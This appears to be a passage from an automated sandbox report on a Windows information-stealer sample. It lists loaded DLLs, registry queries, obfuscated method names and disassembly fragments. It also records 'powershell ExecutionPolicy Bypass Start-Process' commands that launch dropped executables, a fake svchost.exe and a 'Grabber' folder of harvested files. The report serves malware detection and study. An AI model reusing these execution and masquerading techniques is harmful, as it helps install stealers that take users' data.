                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | File written: C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: zrrHgsDzgS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: zrrHgsDzgS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: winload_prod.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: winload_prod.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr

                    Data Obfuscation

Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_017F3AE0 push ebx; retf 7134h | 7_2_017F3BDA
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_017FD6B0 push es; ret | 7_2_017FD6C0
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C9F90 push eax; iretd | 7_2_075C9F91
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C256B push cs; ret | 7_2_075C256F
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C1244 push ds; ret | 7_2_075C1245
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C1215 push ds; ret | 7_2_075C1217
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C12A4 push ds; ret | 7_2_075C12A5
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_075C89EF push dword ptr [esp+ecx*2-75h]; ret | 7_2_075C89F3
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_0761CD65 push EB076D30h; retf | 7_2_0761CD6A
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_07610971 push es; ret | 7_2_07610980
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_076CDD10 pushad ; iretd | 7_2_076CDD11
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_076CCB52 pushfd ; ret | 7_2_076CCB59
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_076CC8CB push ds; ret | 7_2_076CC8F5
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_08176907 push eax; retf | 7_2_0817690D
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 7_2_08177106 push esp; ret | 7_2_08177109
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Code function: 15_2_05400538 push eax; ret | 15_2_05400545
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Code function: 15_2_0540E590 push es; ret | 15_2_0540E5A0
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Code function: 15_2_0540EC58 push esp; iretd | 15_2_0540EC59
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Code function: 28_2_050A0538 push eax; ret | 28_2_050A0545
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Code function: 28_2_050AEC58 push esp; iretd | 28_2_050AEC59
Source: zrrHgsDzgS.exe, mDdWusHvKjN.cs | High entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
Source: svchost.exe.0.dr, mDdWusHvKjN.cs | High entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, mDdWusHvKjN.cs | High entropy of concatenated method names: 'whNsRutPAVgWYIR', 'ZHAJfhfTdMeRATSc', 'cXwWRyDzuxp', 'fdbUiFSpvRBsW', 'rbrvcWQMTUecvVGozR', 'hwwZLyNLEsam', 'pMcNozYWlkyrwJI', 'iBXCqebzvyo', 'UHlfhfOzmiN', 'YwrdNNkfdjWXY'
Source: 7.2.svchost.exe.7450000.3.raw.unpack, QisSSXoFjUNPRyebPKUc.cs | High entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
Source: 7.2.svchost.exe.7450000.3.raw.unpack, Connection.cs | High entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.cs | High entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
Source: 7.2.svchost.exe.7450000.3.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.cs | High entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, QisSSXoFjUNPRyebPKUc.cs | High entropy of concatenated method names: 'v87oFT0wtQ4', 'J5roFSvPCjR', 'joGoF4tyrXN', 'JRDoFdABYTM', 'j91oF7v1EOr', 'AYFoF1K6jGX', 'vTboFFZSGZp', 'Wj8oFGqlJpZ', 'TiroFk9Rur2', 'zTEoFMeJJRf'
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, Connection.cs | High entropy of concatenated method names: 'gTno7tNfvVQ', 'dr53PUohPCPIL68U61S7', 'l1dThaohAGMU1gnt8yNH', 'o1QodeniRPA', 'VQXodjO1FJN', 'k1LodKRNX6J', 'Ldmodwu6Zx7', 'GKuod0CLlVX', 'TFrodHTD5Be', 'UTvodDZfZbd'
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.cs | High entropy of concatenated method names: 'y2QsfpohB7Zf1Nl7XDHk', 'n6mGHaohJD7ITsIwSaF7', 'N2uo1v2XGV3', 'lnCHhaoBZ3pR9Ag4Ghr2', 'tkUIKToB2UnNqkWKgtAH', 'gg5AoLoBIYEvcUqSxruC', 'm65rVMoBgf1EuEv0SGBT', 'xJrXxtoBXB9dZOKOxuLv', 'mpM5QooBo71SoBKYglw3', 'sD0nIPoBuVdNCUJGy1Oi'
Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, Y4YEPAoF6Ge9CZK1Z7MK.cs | High entropy of concatenated method names: 'ug4oN2aOqti', 'cWioNIYKiTn', 'DXioNgl28Qb', 'CqfoNX4SOGs', 'GwPoNo2a3AI', 'S41oNuQkqdX', 'l8boNYA8Kbu', 'wIloGIRWZO5', 'QJuoNbwxvZU', 'gCKoNW1bqLX'
